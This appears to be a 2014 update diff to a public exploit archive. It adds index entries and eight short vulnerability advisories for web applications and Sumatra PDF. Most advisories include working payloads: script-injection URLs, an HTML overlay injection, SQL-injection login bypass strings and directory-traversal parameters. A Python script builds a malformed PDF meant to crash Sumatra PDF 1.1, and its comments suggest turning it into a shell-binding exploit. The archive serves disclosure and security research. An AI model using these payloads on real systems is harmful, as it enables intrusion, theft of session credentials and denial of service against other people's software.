Updated 08_03_2014

files.csv

@@ -30829,3 +30829,11 @@ id,file,description,date,author,platform,type,port
 34225,platforms/php/webapps/34225.txt,"TornadoStore 1.4.3 SQL Injection and HTML Injection Vulnerabilities",2010-06-29,"Lucas Apa",php,webapps,0
 34226,platforms/php/webapps/34226.txt,"System CMS Contentia 'news.php' SQL Injection Vulnerability",2010-06-30,GlaDiaT0R,php,webapps,0
 34229,platforms/php/webapps/34229.txt,"ArcademSX 2.904 'cat' Parameter Cross Site Scripting Vulnerability",2010-06-29,"Th3 RDX",php,webapps,0
+34230,platforms/windows/remote/34230.txt,"Freewebscriptz Online Games Login Multiple SQL Injection Vulnerabilities",2009-12-31,"Hussin X",windows,remote,0
+34231,platforms/php/webapps/34231.txt,"LiveZilla 3.1.8.3 Multiple Cross Site Scripting Vulnerabilities",2009-12-30,MaXe,php,webapps,0
+34232,platforms/php/webapps/34232.txt,"DPScms 'q' Parameter SQL Injection and Cross Site Scripting Vulnerabilities",2010-07-01,Ariko-Security,php,webapps,0
+34233,platforms/windows/dos/34233.py,"Sumatra PDF 1.1 Denial Of Service Vulnerability",2010-07-01,"Azim Poonawala",windows,dos,0
+34234,platforms/php/webapps/34234.txt,"Flatnux 2010-06.09 'find' Parameter Cross Site Scripting Vulnerability",2010-07-01,ITSecTeam,php,webapps,0
+34235,platforms/php/webapps/34235.txt,"Wiki Web Help 0.2.7 Cross Site Scripting and HTML Injection Vulnerabilities",2010-07-01,"John Leitch",php,webapps,0
+34236,platforms/php/webapps/34236.txt,"ReCMS 'users_lang' Parameter Directory Traversal Vulnerability",2010-07-01,Locu,php,webapps,0
+34237,platforms/multiple/webapps/34237.txt,"Xplico 0.5.7 'add.ctp' Cross Site Scripting Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",multiple,webapps,0

platforms/multiple/webapps/34237.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/41322/info
+
+Xplico is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Xplico 0.5.7 is vulnerable; other versions may also be affected. 
+
+opt/xplico/xi/app/views/pols/add.ctp:13
+echo $form->input('Pol.name',  array('maxlength'=> 50, 'size' =>
+'50','label' => 'Case
+name&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp'));
+
+Attack: Case name=[XSS] (POST)
+

platforms/php/webapps/34231.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41271/info
+
+LiveZilla is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LiveZilla 3.1.8.3 is vulnerable; other versions may be affected.
+
+http://www.example.com/livezilla/map.php?lat=%3C/script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C/script%3E 

platforms/php/webapps/34232.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/41273/info
+
+DPScms is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example URIs are available:
+
+http://www.example.com/index.php?q=[SQLI]
+http://www.example.com/index.php?q=[XSS] 

platforms/php/webapps/34234.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41282/info
+
+Flatnux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Flatnux 2010-06.09 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?mod=none_Search&find="><script>alert(1)</script> 

platforms/php/webapps/34235.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/41306/info
+
+Wiki Web Help is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code could run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Wiki Web Help 0.2.7 is vulnerable; other versions may also be affected. 
+
+The following example URI and input are available:
+
+Cross-site scripting:
+
+http://www.example.com/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E
+
+HTML Injection:
+
+<div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div> 

platforms/php/webapps/34236.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41310/info
+
+ReCMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. 
+
+http://www.example.com/state.php?data=country&val=italia&users_lang=[DT] 

platforms/windows/dos/34233.py

@@ -0,0 +1,109 @@
+source: http://www.securityfocus.com/bid/41276/info
+
+Sumatra PDF is prone to an unspecified denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected application, resulting in a denial-of-service condition.
+
+Sumatra PDF 1.1 is vulnerable; other versions may also be affected. 
+
+###########################################################################
+###########################################################################
+######## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ########
+###########################################################################
+#         Vulnerability Detection Time : 21st June 2010, 1:13 AM          #
+#	    Tested on version 1.1 of Sumara PDF Reader                      #
+#         Nature : Accidental Discovery                                   #
+###########################################################################
+# Description : Sumatra PDF Reader crashed while testing recovered PDF    #
+#               Files from a HardDisk. PDF Files recovered using Forensic #
+#               Tools were large in size. DoS code has been optimised to  #
+#               implement the crash with reduced file-size.               #
+# Notes : This source can be modified after analyzing the crash appcompat #
+#         files to write shell bind / other payloaded exploits.           #
+#         Sumatra PDR Reader crashed when  PDF Files were already         #
+#         associated to launch it.
+#                                                                         #
+# Thanks to Felicity. Hope you got your files back :-)                    #
+###########################################################################
+# Vulnerability Discoverer : Azim Poonawala [ QUAKERDOOMER ]              #
+# Email : quakerdoomer [ @ ] fmguy.com                                    # 
+###########################################################################
+###########################################################################
+
+
+#!/usr/bin/python
+# Usage: python sumatra_pdf_v1.1_DoS_file.py
+
+data = (
+	"\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x25\xE2\xE3\xCF\xD3\x0D\x0A" +
+	"\x36\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x48\x5B\x36\x37\x36\x20" +
+	"\x31\x35\x37\x5D\x2F\x4C\x69\x6E\x65\x61\x72\x69\x7A\x65\x64\x20" +
+	"\x31\x2F\x45\x20\x31\x34\x38\x30\x32\x2F\x4C\x20\x31\x38\x37\x31" +
+	"\x39\x2F\x4E\x20\x31\x2F\x4F\x20\x39\x2F\x54\x20\x31\x38\x35\x35" +
+	"\x33\x3E\x3E\x0D\x65\x6E\x64\x6F\x62\x6A\x0D\x20\x20\x20\x20\x20" +
+	"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" +
+	"\x20\x20\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x36\x20\x31\x39\x0D\x0A" +
+	"\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30" +
+	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x33\x33\x20\x30" +
+	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36" +
+	"\x37\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
+	"\x30\x30\x30\x39\x30\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
+	"\x30\x30\x30\x30\x30\x30\x31\x30\x33\x38\x20\x30\x30\x30\x30\x30" +
+	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x32\x32\x39\x20\x30" +
+	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x36" +
+	"\x38\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
+	"\x30\x30\x32\x30\x39\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
+	"\x30\x30\x30\x30\x30\x30\x32\x31\x32\x34\x20\x30\x30\x30\x30\x30" +
+	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x31\x36\x38\x20\x30" +
+	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x33\x39" +
+	"\x34\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
+	"\x30\x30\x34\x33\x33\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
+	"\x30\x30\x30\x30\x30\x30\x36\x39\x39\x39\x20\x30\x30\x30\x30\x30" +
+	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x37\x35\x39\x20\x30" +
+	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x39" +
+	"\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30" +
+	"\x30\x30\x38\x32\x34\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A" +
+	"\x30\x30\x30\x30\x30\x30\x38\x34\x39\x38\x20\x30\x30\x30\x30\x30" +
+	"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x31\x31\x34\x30\x32\x20\x30" +
+	"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x31\x34\x37" +
+	"\x32\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61\x69" +
+	"\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x53\x69\x7A\x65\x20\x32\x35\x2F" +
+	"\x50\x72\x65\x76\x20\x31\x38\x35\x34\x33\x2F\x52\x6F\x6F\x74\x20" +
+	"\x37\x20\x30\x20\x52\x2F\x49\x6E\x66\x6F\x20\x35\x20\x30\x20\x52" +
+	"\x2F\x49\x44\x5B\x3C\x33\x64\x32\x38\x34\x30\x64\x30\x39\x37\x36" +
+	"\x61\x37\x66\x32\x61\x37\x30\x34\x31\x37\x32\x36\x65\x37\x30\x38" +
+	"\x33\x38\x31\x62\x30\x3E\x3C\x65\x39\x35\x37\x38\x32\x63\x37\x34" +
+	"\x36\x62\x38\x34\x39\x34\x64\x39\x62\x39\x37\x31\x33\x30\x38\x37" +
+	"\x31\x38\x33\x36\x62\x34\x39\x3E\x5D\x3E\x3E\x0D\x0A\x73\x74\x61" +
+	"\x72\x74\x78\x72\x65\x66\x0D\x0A\x30\x0D\x0A\x25\x25\x45\x4F\x46" +
+	"\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" +
+	"\x20\x20\x0D\x0A\x38\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x4C\x65" +
+	"\x6E\x67\x74\x68\x20\x38\x30\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46" +
+	"\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x2F\x4C\x20\x39\x30\x2F" +
+	"\x53\x20\x34\x30\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\xDA" +
+	"\x62\x60\x60\x10\x60\x60\x60\xFA\xC0\x20\x04\x66\xAE\x0C\xA8\x80" +
+	"\x19\x88\x59\x18\x38\x16\x80\xD5\xC0\x81\x20\x03\x8C\xAF\xC4\xC0" +
+	"\xC3\xFA\x61\xAE\x54\x61\x11\x03\x03\x57\xCE\xC2\x94\x25\x9B\xAE" +
+	"\xF1\x5C\xB8\xCC\x7B\xDB\xEC\xEC\x02\x2D\xB0\x3C\x23\x03\x83\xA5" +
+	"\x29\x90\x66\x02\x62\x0B\x80\x20\x03\x20\x10\xE9\x0D\xCE\x0D\x0A" +
+	"\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x65\x6E\x64\x6F\x62\x6A" +
+	"\x0D\x37\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x50\x61\x67\x65\x73" +
+	"\x20\x33\x20\x30\x20\x52\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61" +
+	"\x6C\x6F\x67\x2F\x50\x61\x67\x65\x4C\x61\x62\x65\x6C\x73\x20\x31" +
+	"\x20\x30\x20\x52\x2F\x4D\x65\x74\x61\x64\x61\x74\x61\x20\x34\x20" +
+	"\x30\x20\x52\x3E\x3E\x0D\x65\x6E\x64\x6F\x62\x6A"
+);
+
+try:
+    f1 = open("SumatraPDF_Reader_1.1_crasher_DoS.pdf","w")
+    f1.write(data)
+    f1.close()
+    print("\nPDF file created ! : [SumatraPDF_Reader_1.1_crasher_DoS.pdf]\nLaunch it to run under Sumatra PDF Reader v1.1 to test crash.\n\nNOTE : 
+Launching Sumatra PDF Reader and then using File/Open Ctrl+O to open\nthis file WON'T cause a DoS\n")
+    print("Written by : Azim Poonawala (QUAKERDOOMER) [ quakerdoomer [ @ ] fmguy.com 
+]\n\t\thttp:/solidmecca.co.nr\n\t\thttp://winautopwn.co.nr\n\t\thttp://my.opera.com/quakerdoomer");
+except:
+    print "Error"
+
+
+

platforms/windows/remote/34230.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41267/info
+
+Free Web Scriptâ??z Online Games is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+
+The following example data are available:
+
+user: ' or ' 1=1
+pass: ' or ' 1=1